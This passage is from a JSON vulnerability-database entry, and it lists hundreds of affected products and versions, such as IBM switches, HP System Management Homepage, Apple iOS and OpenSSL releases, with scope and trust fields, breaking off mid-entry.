"model": "abyp-10g-2sr-2lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.102" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.6" }, { "model": "system networking rackswitch g8124", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.3.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8.0" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8852" }, { "model": "si4093 si fabric", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.11.0" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8750" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15-210" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.4" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.54" }, { "model": "abyp-2t-2s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "security proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.5.0" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "sterling connect:enterprise for unix ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.0.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "2.3.1" }, { "model": "aspera connect server", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.2" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.08" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.9.1" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0-103" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12.201" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.95" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.06" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.3" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "1.0" }, { "model": "qradar security information and event manager mr2 patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.15" }, { "model": "cognos controller fp3 if2", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.8.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.11.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0-95" }, { "model": "security network controller 1.0.3379m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.7" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.6" }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "qradar security information and event manager mr2 patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.19" }, { "model": "openscape voice r1.43.1", "scope": "ne", "trust": 0.3, "vendor": "unify", "version": "v7" }, { "model": "abyp-0t-4s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "algo one aggregation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9" }, { "model": "project openssl 0.9.8m beta1", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "hp-ux b.11.11 (11i", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "v1)" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "abyp-4ts-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.45" }, { "model": "sterling connect:enterprise for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.5.0.38" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.07" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.96" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11150-11" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1.1" }, { "model": "flex system fc5022 16gb san scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "infosphere master data management provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "algo one ase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "abyp-10g-4lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "abyp-10g-4lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.10" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.0" }, { "model": "qradar security information and event manager patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.44" }, { "model": "netezza platform software 7.0.4.8-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2.127" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.10" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "algo one core", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-109" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "ds8800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "86.31.123.0" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.07" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.1.0" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1881" }, { "model": "netezza platform software 7.1.0.4-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "openscape voice r1", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.5" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.9" }, { "model": "algo one mag", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7" }, { "model": "abyp-0t-0s-4l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.11" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aspera proxy", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.2.2" }, { "model": "abyp-4t-0s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1-73" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "aspera connect server", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.1" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "cognos insight", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.2.4" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.9" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "aspera enterprise server", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.4" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.6" }, { "model": "flex system fc5022 16gb san scalable switch 7.3.0a", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "abyp-0t-2s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "virtual fabric 10gb switch module for bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.7.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.41" }, { "model": "storediq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.21" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0-14" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "sametime community server hf1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "project openssl 0.9.8ze", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.3.19" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.04" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.63" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.5" }, { "model": "project openssl 1.0.0o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "system networking rackswitch g8264t", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.14.0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7779" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.1" }, { "model": "algo one core", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.2" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5" }, { "model": "sametime community server limited use", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.02" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "hp-ux b.11.31 (11i", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "v3)" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6" }, { "model": "netezza platform software 7.0.4.8-p3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system networking rackswitch g8332", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.19.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.20" }, { "model": "system networking rackswitch g8052", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.11.4.0" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.1" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.40" }, { "model": "abyp-0t-2s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aspera enterprise server", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.2" }, { "model": "ctpos 7.0r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14" }, { "model": "abyp-2t-0s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.32" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15210" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.9.2" }, { "model": "sterling connect:enterprise for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.4.4.04" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.64" }, { "model": "abyp-10g-4sr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "g8264cs si fabric image", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.11.0" }, { "model": "security network controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system networking rackswitch g8264cs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "flex system en4023 10gb scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "alienvault", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "5.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.16" }, { "model": "enterprise manager ops center", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.1" }, { "model": "rational tau interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.14" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.14" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.0.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "enterprise session border controller ecz7.3m2p2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "system networking rackswitch g8264cs", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.11.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "version control repository manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.740" }, { "model": "icewall sso dfw r2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "system networking rackswitch g8264", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.14.0" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.2" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "ddos secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4.0" }, { "model": "system management homepage 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.411" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": 